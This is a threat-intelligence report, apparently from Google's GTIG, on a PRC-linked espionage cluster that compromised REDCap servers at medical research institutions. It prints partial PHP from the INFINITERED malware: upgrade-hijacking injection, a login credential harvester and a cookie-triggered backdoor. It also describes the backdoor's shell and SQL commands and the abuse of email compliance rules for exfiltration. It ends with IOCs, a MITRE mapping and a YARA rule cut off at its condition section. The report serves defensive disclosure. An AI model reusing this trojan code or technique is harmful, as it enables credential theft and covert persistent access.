<p><span>GTIG disrupted the malicious infrastructure associated with this threat actor. Working with Mandiant Consulting, we notified the affected organizations upon detection and offered our assistance with remediation. We have updated </span><a href="https://cloud.google.com/security/products/security-operations"><span>Google Security Operations</span></a><span> (SecOps) with relevant intelligence, enabling defenders to identify indicators of compromise (IOCs) within their networks. We encourage all users and customers to follow recommended best practices for </span><a href="https://knowledge.workspace.google.com/admin/apps/best-practices-for-third-party-idp-and-google-workspace-configuration" rel="noopener" target="_blank"><span>third-party Identity Providers</span></a><span> (IdP) and ensure </span><a href="https://knowledge.workspace.google.com/admin/security/about-2sv-enforcement-for-admins" rel="noopener" target="_blank"><span>2-Step Verification</span></a><span> (2SV) is enabled across all accounts.</span></p>
<h3><span>Campaign Overview</span></h3>
<p><span>The campaign targeted a diverse set of national, state, and private medical entities. These organizations comprise world-renowned clinical providers, premier academic centers, North American military health institutions, professional advocacy groups, and health regulatory bodies. Their research areas span a broad spectrum of modern medicine, from molecular discovery and clinical drug trials to state-level public health policy and military readiness. They employ thousands of people with a combined research budget in the billions of dollars.</span></p>
<p><span>The earliest known compromise occurred in September 2023, after which GTIG observed a consistent operational pattern. The threat actor exploited externally facing </span><a href="http://project-redcap.org/" rel="noopener" target="_blank"><span>REDCap</span></a><span> (Research Electronic Data Capture) servers and deployed custom malware named INFINITERED to capture legitimate REDCap login credentials. Then, after remaining undetected for more than a year, UNC6508 used the captured credentials to access the victim’s internal network. The threat actor was also observed using the novel technique of manipulating domain content compliance rules for data exfiltration. Lastly, UNC6508 used sophisticated operations security (OpSec) techniques to conceal and obfuscate their activity. </span></p>
<p><span>GTIG collaborated closely with Mandiant Consulting, the FLARE team, and Workspace Security on this effort to combine our threat intelligence, incident response, and reverse engineering expertise across Google Cloud. This enabled us to develop a complete picture of the </span><a href="https://cloud.google.com/security/resources/insights/targeted-attack-lifecycle"><span>attack lifecycle</span></a><span> from initial compromise to complete mission. </span><span>GTIG also extends thanks to the affected organizations for their cooperation and the valuable post-exploitation insights they shared.</span></p>
<h3><span>Prevention, Detection, and Remediation</span></h3>
<p><span>GTIG recommends defenders implement the following security measures, across all Cloud enterprise platforms, to mitigate this threat:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Secure Admin Accounts</strong><span>: Enforce phishing-resistant </span><a href="https://knowledge.workspace.google.com/admin/security/deploy-2-step-verification" rel="noopener" target="_blank"><span>2-Step Verification (2SV)</span></a><span> for enterprise administrator accounts, including through third-party Identity Providers.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Advanced Protection</strong><span>: Consider enrolling highly sensitive accounts in our </span><a href="https://landing.google.com/intl/en_in/advancedprotection/" rel="noopener" target="_blank"><span>Advanced Protection Program</span></a><span> for additional safeguards against malware and phishing attacks.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Prevent Cookie Theft</strong><span>: Enforce </span><a href="https://knowledge.workspace.google.com/admin/security/prevent-cookie-theft-with-session-binding" rel="noopener" target="_blank"><span>Device Bound Session Credentials</span></a><span> (DBSC) with </span><a href="https://knowledge.workspace.google.com/admin/security/protect-your-business-with-context-aware-access" rel="noopener" target="_blank"><span>CAA</span></a><span> for highly sensitive accounts on Windows devices to prevent session hijacking.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Monitor Audit Logs</strong><span>: Enable </span><a href="https://docs.cloud.google.com/logging/docs/audit/gsuite-audit-logging"><span>Audit logs</span></a><span> to analyze, monitor, and alert on changes to your data.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Control Data</strong><span>: Define </span><a href="https://knowledge.workspace.google.com/admin/security/about-dlp" rel="noopener" target="_blank"><span>Data Loss Prevention (DLP) rules</span></a><span> to block or alert on external sharing of sensitive data.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Audit Compliance Rules</strong><span>: Review </span><a href="https://knowledge.workspace.google.com/admin/reports/admin-log-events" rel="noopener" target="_blank"><span>Admin audit logs</span></a><span> and content compliance rules for unauthorized modifications.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>SIEM Coverage</strong><span>: Consider using </span><a href="https://cloud.google.com/security/products/security-operations"><span>Google Security Operations</span></a><span> (SecOps) and ensure Workspace logs are included in your Security Information and Event Management (SIEM) pipeline.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Password Protection</strong><span>: Use Chrome Enterprise </span><a href="https://support.google.com/chrome/a/answer/13597868?hl=en" rel="noopener" target="_blank"><span>Password Leak Detection</span></a><span> to alert when potentially compromised password use is detected.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Patch REDCap</strong><span>: Fully updated REDCap installations to the latest software version and ensure older versions are completely removed.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Monitor for INFINITERED</strong><span>: Scan REDCap servers for the presence of INFINITERED using the provided YARA rule and IOCs.</span></p>
</li>
</ul>
<h3><span>Medical Research University Compromise</span></h3>
<p><span>In September 2023, a </span><a href="http://project-redcap.org/" rel="noopener" target="_blank"><span>REDCap</span></a><span> server belonging to a North American medical research institution was compromised. Continuing activity was observed through November 2025. During this time period, UNC6508 carried out the following attack chain.</span></p>
<ol>
<li aria-level="1">
<p role="presentation"><span>Exploit the REDCap server.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>After three months, deploy the INFINITERED malware.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>INFINITERED stealthily records credentials, and persists through upgrades, for more than a year.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Pivot to a domain admin account.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Add the malicious content compliance rule.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Silently “BCC-forward” matched emails to a threat actor-controlled account.</span></p>
</li>
</ol></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/inifinitered-fig1.max-1000x1000.png" alt="Campaign attack flow diagram">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="3zqf8">Figure 1: Campaign attack flow diagram</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Initial Access: REDCap Exploitation and INFINITERED</span></h3>
<p><span>UNC6508 consistently targets REDCap servers. REDCap is a web-based software platform designed specifically for building and managing online databases and surveys, in compliance with regulations for medical and scientific research. It is a commonly used platform in the North American medical research community.</span></p>
<p><span>GTIG was not able to confirm how UNC6508 initially gained access to the REDCap server. By design, REDCap allows administrators to continue running legacy software side-by-side with the current version. UNC6508 was observed probing for these vulnerable legacy versions on several target organizations’ REDCap systems. This highlights not only the increasing importance of rapidly applying security patches, but also promptly removing older software versions to prevent </span><a href="https://attack.mitre.org/techniques/T1689/" rel="noopener" target="_blank"><span>downgrade attacks</span></a><span>.</span></p>
<p><span>Upon establishing a foothold on the REDCap server, UNC6508 performed internal reconnaissance and credential discovery to obtain database and service account credentials. The threat actor also deployed a web shell named "</span><span>help.php</span><span>", which maintained persistence and functioned as an uploader in the REDCap application.</span></p>
<h3><span>INFINITERED Analysis</span></h3>
<p><span>Three months after the initial compromise, UNC6508 deployed a custom malware payload tracked as INFINITERED. This malware implements its functionality across three distinct modular components by trojanizing legitimate REDCap system files.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Dropper and Upgrade Interception </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Credential Harvester</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Backdoor, with command and control (C2)</span></p>
</li>
</ul>
<p><span>GTIG discovered multiple organizations across the US and Canada compromised with INFINITERED. All of these organizations were promptly notified of the compromise upon detection and offered our assistance with remediation.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/inifinitered-fig2.max-1000x1000.png" alt="INFINITERED diagram">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="3zqf8">Figure 2: INFINITERED diagram</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Dropper and Upgrade Interception</span></h4>
<p><span>To maintain persistent remote access, INFINITERED injects its code into new REDCap versions by intercepting the upgrade process. This capability is embedded into the legitimate REDCap upgrade system file. INFINITERED performs this code injection following these steps.</span></p>
<ol>
<li aria-level="1">
<p role="presentation"><span>Read the current software version, which includes the INFINITERED code. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Extract the malicious logic using GUID delimiter </span><span>b49e334d-9c01-463e-9bc5-00a6920fb66e.</span><span> </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Inject backdoor code into the custom hooks configuration file. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Inject credential harvester code into the authentication system file.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Inject the extracted code from step 2 into the upgrade system file.</span></p>
</li>
</ol>
<p><span>In Elastic Beanstalk environments, INFINTERED performs additional steps to ensure persistence in cloud deployments. </span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>// b49e334d-9c01-463e-9bc5-00a6920fb66e
...
$file_upgrade = $base_path."Upgrade.php"; 
$file_content_upgrade = $zip-&gt;getFromName($file_upgrade); // new upgrade file content
$file_content_upgrade_local = file_get_contents(__FILE__); // Contents of the current file 
...
if ($file_content_upgrade !== false) {
    // Base64 GUID delimiter
    $dummy_marker = base64_decode('YjQ5ZTMzNGQtOWMwMS00NjNlLTliYzUtMDBhNjkyMGZiNjZl');
    $pattern = "/$dummy_marker(.*?)$dummy_marker/s";
    if (preg_match($pattern, $file_content_upgrade_local, $matches)) {
        $extracted_text = $matches[0];
        $search_content = "// If running on AWS Elastic Beanstalk"; 
        $upgrade_decode = "// ".$extracted_text."\r\n\t\t".$search_content;
        $new_content = str_replace($search_content, $upgrade_decode, $file_content_upgrade);
        $zip-&gt;deleteName($file_upgrade);
        $zip-&gt;addFromString($file_upgrade, $new_content);
    }
}
$zip-&gt;close();
...
// b49e334d-9c01-463e-9bc5-00a6920fb66e</code></pre>
<p><span><span>Code Snippet 1: Intercept upgrades and inject INFINITERED code</span></span></p></div>
<div class="block-paragraph_advanced"><h4><span>Credential Harvester</span></h4>
<p><span>INFINITERED injects a credential harvester into the authentication system file to compromise user accounts. This component of the malware captures usernames and passwords submitted via POST requests during the login process. The credentials are encrypted using the environment’s default encryption routine and hidden inside a local REDCap sessions database table with the string “</span><span>xc32038474a” </span><span>prefixed to the Session ID. </span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>$currentUTC = gmdate('Y-m-d H:i:s');
$str = encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);
include dirname(__FILE__, 3) . DIRECTORY_SEPARATOR . 'redcap_connect.php';
$expiration_timestamp = strtotime("+60 days", strtotime($currentUTC));
$session_id = 'xc32038474a'.substr(bin2hex($currentUTC), -20);
$session_sql = "INSERT INTO [REDACTED] ([REDACTED],[REDACTED],[REDACTED]) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))";
@$rc_connection-&gt;query($session_sql);</code></pre>
<p><span><span>Code Snippet 2: Hide credentials in a legitimate database table</span></span></p></div>
<div class="block-paragraph_advanced"><h4><span>Backdoor</span></h4>
<p><span>INFINITERED also has backdoor functionality it establishes in the custom hooks system file inside the update package, specifically within a function that executes on every REDCap page load. This global hook ensures the backdoor runs on every page load. INFINITERED looks for a specific HTTP Cookie parameter named "</span><span>REDCAP-TOKEN</span><span>" and a cookie value starting with a specific plaintext string. If these conditions are present, the malware strips the prefix and decrypts the remaining payload with the environment's default decryption routine.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-markup"><code>$cookieValue = $_COOKIE['REDCAP-TOKEN'];
if ($cookieValue) {
    $magic_flag = '[REDACTED]'; // Cookie prefix
    ...
    // Decrypt message if cookie prefix is found
    $key = '[REDACTED]';
    $req_data = substr($cookieValue, strlen($magic_flag));
    $req_data = decrypt($req_data, $key);</code></pre>
<p><span><span>Code Snippet 3: Decrypting commands to INFINITERED</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>If the decrypted payload is empty, the malware acts as a beacon, returning system details such as the OS, PHP version, working directory, and database credentials including the hostname, username, password, and salt. When non-empty, the malware will parse the payload for command tags, which the threat actor can use to execute shell commands, run raw SQL queries, and transfer files.</span></p>
<h4><span>Supported Commands</span></h4>
<p><span>INFINITERED is capable of executing the following commands.</span></p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Command Tag</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>00</code></p>
</td>
<td>
<p><code>Executes arbitrary system commands using shell_exec.</code></p>
</td>
</tr>
<tr>
<td>
<p><code>02</code></p>
</td>
<td>
<p><code>Uploads a file to the server. The payload contains the destination path and file content.</code></p>
</td>
</tr>
<tr>
<td>
<p><code>03</code></p>
</td>
<td>
<p><code>Retrieves stolen credentials stored in the legitimate database table.</code></p>
</td>
</tr>
<tr>
<td>
<p><code>04</code></p>
</td>
<td>
<p><code>Deletes the stolen credential records from the legitimate database table.</code></p>
</td>
</tr>
<tr>
<td>
<p><code>05</code></p>
</td>
<td>
<p><code>Executes arbitrary SQL queries against the database and returns the results.</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ej671a16i7fd8202nu6ltfg5p6x7u</code></p>
</td>
<td>
<p><code>Downloads an arbitrary file from the server. The payload following this tag specifies the full filesystem path of the target file.</code></p>
</td>
</tr>
<tr>
<td>
<p><code>Empty Payload</code></p>
</td>
<td>
<p><code>Beacons system information, database credentials, and configuration details.</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 1: Supported commands for INFINITERED</span></p>
</div></div>
<div class="block-paragraph_advanced"><h3><span>Domain Content Compliance Rule Abuse</span></h3>
<p><span>More than a year after the initial compromise, UNC6508 used overlapping credentials, harvested from REDCap, to access an administrator account. This underscores the challenge and importance of securing systems holistically. Defenders should enable </span><a href="https://knowledge.workspace.google.com/admin/security/deploy-2-step-verification" rel="noopener" target="_blank"><span>2-Step Verification (2SV)</span></a><span> and ensure unique credentials are used across different security domains to mitigate credential replay attacks.</span></p>
<p><span>UNC6508 then leveraged </span><a href="https://knowledge.workspace.google.com/admin/gmail/advanced/set-up-rules-for-advanced-email-content-filtering#compliance_rules" rel="noopener" target="_blank"><span>content compliance rules</span></a><span>, a legitimate feature present in many cloud-based enterprise productivity suites, to exfiltrate specific email communications. Administrators can create these rules to manage email messages that contain content matching predefined sets of words, phrases, text patterns, or numerical patterns. By default, compliance rules apply to all users in an organizational unit. The use of compliance rules for data exfiltration is a novel technique not previously observed with PRC-nexus threat actors.</span></p>
<p><span>Specifically, UNC6508 created a compliance rule named "</span><span>Patroit</span><span>" [sic] that used regular expressions to match on keyword and email address patterns in sent or received emails. Matches were silently BCC-forwarded to a threat actor-controlled Gmail address, </span><span>BebitaBarefoot774[@]gmail[.]com</span><span>, providing a covert and continuous stream of exfiltrated data. Upon discovery, GTIG disabled the Gmail account to prevent further data exfiltration.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/inifinitered-fig3.max-1000x1000.png" alt="Targeted intelligence collection categories">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="9x1mp">Figure 3: Targeted intelligence collection categories</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>The patterns used in the “Patroit” compliance rule suggest strategic intelligence collection targeting geo-strategic policy, military strategy, advanced technology, and medical research. The patterns also include professional email addresses and phone numbers for members of organizations in these spaces. Several of the terms applied have spelling errors, suggesting the list was manually maintained. </span></p>
<p><span>This ambitious scope of intelligence collection from UNC6508 may suggest a broader range of targets beyond the identified victims in the medical research community. GTIG assesses these collection priorities are aligned with the strategic interests of the People's Republic of China. </span></p>
<p><span>While most of the terms relate to defense and technology, the terms including medical research facilities, and the specific pathogen “Chikungunya,” stand out from the others. Chikungunya is a viral disease transmitted to humans from mosquitos and was responsible for an </span><a href="https://www.unmc.edu/healthsecurity/transmission/2025/09/30/explosive-chikungunya-virus-outbreak-in-china/" rel="noopener" target="_blank"><span>outbreak in China's Guangdong province</span></a><span> beginning in July 2025.</span></p>
<h3><span>Operations Security (OpSec)</span></h3>
<p><span>GTIG observed UNC6508 use sophisticated and meticulous OpSec techniques to conceal their activities from defenders. </span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/inifinitered-fig4.max-1000x1000.png" alt="UNC6508 operations security techniques">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="9x1mp">Figure 4: UNC6508 operations security techniques</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>UNC6508 relied heavily on Obfuscation (OBF) networks. This strategy, now frequently employed by PRC-nexus actors, involves routing traffic from offensive operations through a mix of compromised routers, residential proxies, Virtual Private Servers (VPS), and other devices.  </span></p>
<p><span>This operation used exclusively US-based OBF network IP addresses to access both the "</span><span>BebitaBarefoot774[@]gmail[.]com</span><span>" account and when replaying legitimate credentials to access the compromised enterprise administrator account. Additional OpSec techniques were also used, such as obtaining the threat actor-controlled Gmail account through a mass creation service and dedicating it exclusively to email data exfiltration.</span></p>
<p><span>By maintaining a high level of OpSec, UNC6508 significantly complicates the efforts of defenders to identify malicious patterns, establish accurate attribution, and map the threat actor’s infrastructure.</span></p>
<h3><span>Attribution</span></h3>
<p><span>GTIG attributes this activity to UNC6508 with high confidence. This assessment is based on infrastructure overlaps between campaigns, the consistent use of the INFINITERED backdoor on REDCap servers, and the specific targeting of medical research and defense sectors. We assess UNC6508 is an espionage motivated threat cluster, with priorities that align with historic PRC state-sponsored espionage trends and intelligence collection requirements.</span></p>
<h3><span>Indicators of Compromise (IOCs)</span></h3>
<p><span>To assist the wider community, we have also included a list of indicators in a <a href="https://www.virustotal.com/gui/collection/f3a266bed2b73690459e30a2e52e5afd4bc36ea83197ab8bf3d5cb17095a7eef" rel="noopener" target="_blank">GTI Collection</a> for registered users.</span></p>
<h4><span>Network Indicators</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Type</strong></p>
</td>
<td>
<p><strong>Context</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>BebitaBarefoot774@gmail.com</span></p>
</td>
<td>
<p><span>Email</span></p>
</td>
<td>
<p><span>Email exfiltration account</span></p>
</td>
</tr>
<tr>
<td>
<p><span>23.169.65.49</span></p>
</td>
<td>
<p><span>IP</span></p>
</td>
<td>
<p><span>Source of admin login (Compromised ASUS router)</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>File Indicators</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA256</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Persistence (help.php)</span></p>
</td>
<td>
<p><span>ba6b73b0ca0dc7f86b3b397893ac32d729fd53f9df20643288f141f29d020af7</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Credential Harvester </span></p>
</td>
<td>
<p><span>db65c1b9f9e4cb4d729f45ad4b6fcf3e277caf9eb4c875425dec93fd883f9136</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Credential Harvester </span></p>
</td>
<td>
<p><span>c1ac43d23f89d41eb4ff131678ab562ab2cfed9aa334b13767ef141d303b0e5b</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Backdoor </span></p>
</td>
<td>
<p><span>8f0158855a656b629ca76ebca565f18bc25563ded34b65d6771632c20edb68ec</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Backdoor </span></p>
</td>
<td>
<p><span>51a57bfc9ed3eb6451c1c289607814d59e1698c666fb97ac5f694c398f23d045</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Dropper </span></p>
</td>
<td>
<p><span>4efbef69eb3b09bacff892d6a55778d07c418e7f15eba3cf1245e8cdfd8dda0b</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Dropper </span></p>
</td>
<td>
<p><span>58bb25777e0aa86bcd2125101e0bca4e8732b03d91bd8d2f205b446a2a8d5c86</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Host Indicators</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>b49e334d-9c01-463e-9bc5-00a6920fb66e</span></p>
</td>
<td>
<p><span>INFINITERED current software version GUID delimiter</span></p>
</td>
</tr>
<tr>
<td>
<p><span>xc32038474a</span></p>
</td>
<td>
<p><span>INFINITERED Redcap database session ID prefix</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3><strong>MITRE ATT&amp;CK Mapping</strong></h3></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Tactic</strong></p>
</td>
<td>
<p><strong>Technique ID</strong></p>
</td>
<td>
<p><strong>Technique Name</strong></p>
</td>
<td>
<p><strong>Context/Activity</strong></p>
</td>
</tr>
<tr>
<td>
<p><strong>Initial Access</strong></p>
</td>
<td>
<p><span>T1190</span></p>
</td>
<td>
<p><span>Exploit Public-Facing Application</span></p>
</td>
<td>
<p><span>Exploitation of REDCap survey management servers.</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Persistence</strong></p>
</td>
<td>
<p><span>T1505.003</span></p>
</td>
<td>
<p><span>Server Software Component: Web Shell</span></p>
</td>
<td>
<p><span>Deployment of INFINITERED and uploaders.</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1554</span></p>
</td>
<td>
<p><span>Compromise Client Software Binary</span></p>
</td>
<td>
<p><span>Modification of REDCap to intercept updates.</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Defense Evasion</strong></p>
</td>
<td>
<p><span>T1027</span></p>
</td>
<td>
<p><span>Obfuscated Files or Information</span></p>
</td>
<td>
<p><span>Use of Base64 encoding for malicious payloads within PHP files.</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1090.003</span></p>
</td>
<td>
<p><span>Proxy: Multi-hop Proxy</span></p>
</td>
<td>
<p><span>Routing traffic through compromised IoT devices (OBF networks).</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1562.001</span></p>
</td>
<td>
<p><span>Impair Defenses: Disable or Modify Tools</span></p>
</td>
<td>
<p><span>Creating "silent" BCC rules to avoid user detection.</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1689</span></p>
</td>
<td>
<p><span>Downgrade Attack</span></p>
</td>
<td>
<p><span>Exploiting vulnerable legacy versions of REDCap.</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Credential Access</strong></p>
</td>
<td>
<p><span>T1555</span></p>
</td>
<td>
<p><span>Credentials from Password Stores</span></p>
</td>
<td>
<p><span>Accessing local configuration files. </span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1056.003</span></p>
</td>
<td>
<p><span>Input Capture: Web Portal Capture</span></p>
</td>
<td>
<p><span>INFINITERED harvesting plaintext credentials from POST login requests.</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Collection</strong></p>
</td>
<td>
<p><span>T1114.003</span></p>
</td>
<td>
<p><span>Email Collection: Email Forwarding Rule</span></p>
</td>
<td>
<p><span>Use of content compliance rules ("Patroit") for automated exfiltration.</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1213</span></p>
</td>
<td>
<p><span>Data from Information Repositories</span></p>
</td>
<td>
<p><span>Searching storage and email for strategic keywords.</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Command and Control</strong></p>
</td>
<td>
<p><span>T1071.001</span></p>
</td>
<td>
<p><span>Application Layer Protocol: Web Protocols</span></p>
</td>
<td>
<p><span>C2 communication via HTTP Cookie parameters (REDCAP-TOKEN).</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Exfiltration</strong></p>
</td>
<td>
<p><span>T1567</span></p>
</td>
<td>
<p><span>Exfiltration Over Web Service</span></p>
</td>
<td>
<p><span>Silently forwarding sensitive data to actor-controlled Gmail addresses.</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1071.001</span></p>
</td>
<td>
<p><span>Application Layer Protocol: Web Protocols</span></p>
</td>
<td>
<p><span>HTTP response to C2 commands</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>Detections</h3>
<h4>YARA Rules</h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_INFINITERED_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$magic_flag = "ej671a16i7fd8202nu6ltfg5p6x7u"
		$magic_flag_base64 = "ej671a16i7fd8202nu6ltfg5p6x7u" base64
		$marker = "b49e334d-9c01-463e-9bc5-00a6920fb66e"
		$marker_base64 = "YjQ5ZTMzNGQtOWMwMS00NjNlLTliYzUtMDBhNjkyMGZiNjZl"
		$s1 = "substr($cookieValue, strlen($magic_flag));"
		$s2 = "getcwd(), php_uname(), phpversion(), $_SERVER['SERVER_SOFTWARE']"
		$s3 = "'data' =&gt; encrypt($data, $key)"
		$s4 = "$data = shell_exec($command);"
		$s5 = "move_uploaded_file($tmpPath, $fileName)"
		$s6 = "$data = implode('|', $fields)"
		$b_s1 = "substr($cookieValue, strlen($magic_flag));" base64
		$b_s2 = "getcwd(), php_uname(), phpversion(), $_SERVER['SERVER_SOFTWARE']" base64
		$b_s3 = "'data' =&gt; encrypt($data, $key)" base64
		$b_s4 = "$data = shell_exec($command);" base64
		$b_s5 = "move_uploaded_file($tmpPath, $fileName)" base64
		$b_s6 = "$data = implode('|', $fields)" base64
		$t1 = "(isset($_POST['username']) &amp;&amp; $_POST['password'])"
		$t2 = "INSERT INTO redcap_sessions (session_id, session_data, session_expiration) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))"
		$t3 = "encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);"
		$t4 = "redcap_connect.php"
		$b_t1 = "(isset($_POST['username']) &amp;&amp; $_POST['password'])" base64
		$b_t2 = "INSERT INTO redcap_sessions (session_id, session_data, session_expiration) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))" base64
		$b_t3 = "encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);" base64
		$b_t4 = "redcap_connect.php" base64
		$u1 = "$zip-&gt;open($filename) === TRUE)"
		$u2 = "$hooks_encode ="
		$u3 = "$auth_encode ="
		$u4 = "$file_content_hooks = $zip-&gt;getFromName($file_hooks);"
		$u5 = "$file_content_auth = $zip-&gt;getFromName($file_auth);"
		$u6 = "$file_content_upgrade = $zip-&gt;getFromName($file_upgrade);"
		$u7 = "str_replace($search_content, $hooks_decode, $file_content_hooks);"
		$u8 = "str_replace($search_content, $upgrade_decode, $file_content_upgrade);"
		$u9 = "str_replace($search_content, $auth_decode, $file_content_auth);"
		$b_u1 = "$zip-&gt;open($filename) === TRUE)" base64
		$b_u2 = "$hooks_encode =" base64
		$b_u3 = "$auth_encode =" base64
		$b_u4 = "$file_content_hooks = $zip-&gt;getFromName($file_hooks);" base64
		$b_u5 = "$file_content_auth = $zip-&gt;getFromName($file_auth);" base64
		$b_u6 = "$file_content_upgrade = $zip-&gt;getFromName($file_upgrade);" base64
		$b_u7 = "str_replace($search_content, $hooks_decode, $file_content_hooks);" base64
		$b_u8 = "str_replace($search_content, $upgrade_decode, $file_content_upgrade);" base64
		$b_u9 = "str_replace($search_content, $auth_decode, $file_content_auth);" base64
		$filemarker = "&lt;?php"
	condition:
